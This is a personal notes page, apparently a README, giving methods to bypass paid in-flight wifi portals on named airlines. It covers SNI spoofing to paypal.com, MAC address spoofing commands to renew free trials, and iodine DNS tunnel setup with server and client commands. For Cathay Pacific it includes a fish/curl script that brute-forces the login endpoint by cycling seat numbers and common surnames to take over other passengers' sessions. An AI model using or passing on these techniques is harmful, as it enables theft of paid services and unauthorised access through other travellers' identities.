SNI Spoof is easy & efficient enough. Other tricks won't be included if SNI Spoof works. SNI spoof guide & demo

Some airline might have multiple different system installed. Double confirm which one is for your flight!

Detailed Notes

AA

DNS works slowly, DNS works slowly. SNI spoof with hardcoded ip works. If not working, please firstly click payment button.

AC

## Air Canada wifi from `https://wifi.inflightinternet.com/app/ifc/splash`:

SNI spoof works.

send HTTPS traffic to any random http server, and modify SNI to paypal.com (or www.paypal.com).

Warning: DNS doesn't work. prepare your DNS record!

If DNS not working with socks5, set ur dns to 1.1.1.1, or proxy dns via proxy.

## Also works for gogo inflight wifi (delta)

SNI spoof works.

DNS works.

DL

no wifi over pacific ocean

new provider Viasat, SNI spoof paypal works.

OZ

# Panasonic

asiana wifi:

ip whitelist:
MPC➜  sh git:(one) ping 1.2.3.5
PING 1.2.3.5 (1.2.3.5) 56(84) bytes of data.
From 172.29.2.27 icmp_seq=1 Destination Net Prohibited
^C
--- 1.2.3.5 ping statistics ---
2 packets transmitted, 0 received, +1 errors, 100% packet loss, time 1000ms

MPC➜  sh git:(one) ping 151.101.197.21
PING 151.101.197.21 (151.101.197.21) 56(84) bytes of data.
64 bytes from 151.101.197.21: icmp_seq=1 ttl=45 time=766 ms
64 bytes from 151.101.197.21: icmp_seq=2 ttl=45 time=807 ms
64 bytes from 151.101.197.21: icmp_seq=3 ttl=45 time=819 ms

dns allowed but proxied, dns tunnel will work.

worth try: fastly CDN fronting:
MPC➜  sh git:(one) ping www.paypal.com
PING cs1150.wpc.betacdn.net (192.229.210.155) 56(84) bytes of data.
64 bytes from 192.229.210.155: icmp_seq=1 ttl=45 time=824 ms

|OZ     |Panasonic|Fastly CDN fronting   |https blocked.. But domain fronting seems to work? will try http next |

iodine howto

while true; bin/iodined -f -c -P rtlgn24bgn 192.168.99.1 dns.896444.xyz ; sleep 10 ; end
# client:  sudo bin/iodine -f -P rtlgn24bgn dns.896444.xyz
#   when testing, add: -r skip UDP direct mode, avoid cheating in test.
# Then sslocal -s 192.168.99.1 -p 25551 -m chacha20-ietf-poly1305 -k default-password -b 0.0.0.0 -l 1080 --fast-open
#      sslocal -s 192.168.99.1:25551 -b 0.0.0.0:1080 -m chacha20-ietf-poly1305 -k default-password  --tcp-fast-open

iodine too slow. Need to test domain fronting (fastly ip, paypal SNI, custom Host) (SNI also dont need to be correct!)

Update Apr 2026: someone said dnstt / slipstream were much faster impl. Try it out if u want.

EVA AIR

# Panasonic

DNS works, but TCP traffic to external server got blocked.

SNI spoof doesn't work. Need to use MAC spoof to renew the 30min trial time.

sudo ip l set wlp2s0 down
sudo ip l set wlp2s0  address 10:11:12:11:12:28
sudo ip l set wlp2s0 up

To share PC wifi with phone, need to create_ap:

nmcli connection modify EVA-WiFi  wifi.band bg wifi.channel 11

> From Internet: they said android could also spoof MAC with `Enhanced Wi-Fi Mac Randomization / Wifi non-persistent MAC randomization` in Developer Options.

NH

Parasonic international flight, unlimited free messaging works fine.

Use SNI=paypal.com spoof, you can visit any website (just kind of slow) ; non 443 works.

JL

1 hour free wifi without hack.

After that, MAC spoof should work, not tested

UA Panasonic

on desktop, make browser window narrower to enable extra option (free messaging + tmobile free wifi)

SNI spoof works with free messaging clicked. www.paypalobjects.com ; non 443 works.

AS

use free message + SNI spoof www.paypal.com.

t-mobile number also works. no SMS required.

CX

seat map is available in: 
    any movie -> play -> watch together

#### please manually create multiple threads.
## usage: fish this.fish 11 12
## usage: fish this.fish 14 16
## usage: fish this.fish 17 19
## usage: fish this.fish 20 21
#### if you don't like fish, tell GPT to convert to bash.
set -gx prefix (random)

# row 11-12, 14-21
for l in (seq $argv[1] $argv[2])
  for r in A D G K
    for name in wang liu zhang li zhou wu pan xu zhao qian sun zheng jiang zhu chen yuan shen cai long cao tian luo
echo TEST "$l$r $name ..."

# copy from: 1. submit something in brower, 2. F12-right-click copy as curl, 3. modify last line as template. 4. run it
curl 'https://connect.cathaypacific.com/wbs/api/v1/login/third-party/' \
  -X POST \
[PLEASE copy from browser F12... ...]
  --data-raw "authorization=token%3DSFdBKk86MzU6Ik0zXEhpbWFsYXlhXFNoYXJlZFxXQlNBcGlBdXRoXFRva2VuIjo2OntzOjk6IgAqAHNpdGVJZCI7aToxNDQzMTtzOjE2OiIAKgByZW1vdGVBZGRyZXNzIjtzOjEzOiIxMC43NS4xMzMuMTY0IjtzOjEzOiIAKgBtYWNBZGRyZXNzIjtzOjEyOiIwQTAwMEE0Qjg1QTQiO3M6MTE6IgAqAGRldmljZUlkIjtOO3M6MTA6IgAqAGNyZWF0ZWQiO086ODoiRGF0ZVRpbWUiOjM6e3M6NDoiZGF0ZSI7czoyNjoiMjAyNi0wNC0wMSAwNzoyNjo0NC43NTg5MzgiO3M6MTM6InRpbWV6b25lX3R5cGUiO2k6MztzOjg6InRpbWV6b25lIjtzOjM6IlVUQyI7fXM6OToiACoAb3JpZ2luIjtzOjMzOiJodHRwczovL2Nvbm5lY3QuY2F0aGF5cGFjaWZpYy5jb20iO318OGVmZjJlM2JmMjY3ZGUyMTc3MTlkNzU4YzhmMmQ0ZGJmNmJmODczNDc1YTFjZDYzOWRkZTRkM2RkYzViYjM1OA%3D%3D&login%5BfirstName%5D=&login%5BlastName%5D=$name&login%5BseatNumber%5D=$l$r&login%5Bterms%5D=true" > /tmp/out.txt$prefix

# error 652-1702 = wrong answer try again
grep "Internal system exception" /tmp/out.txt$prefix ; and echo "TRY AGAIN" ; and continue
cat /tmp/out.txt$prefix
echo "Possible HIT. rm /tmp/out.txt$prefix to continue..."
while test -f /tmp/out.txt$prefix
  sleep 1
end

    end    
  end
end

www.alipay.com is a good target.
FORTINET Webfilter blocks SNI spoof with fake cert.
reality should work, but doesnt. I didnt dig deeper.
plain http meek without tls might (unlikely) work... I dont want to try.
system is panasonic

you might be blacklisted after SNI spoof attempt. Just spoof MAC

SNI spoof sometimes (rarely) works over US airspace. Maybe the firewall is in ground station?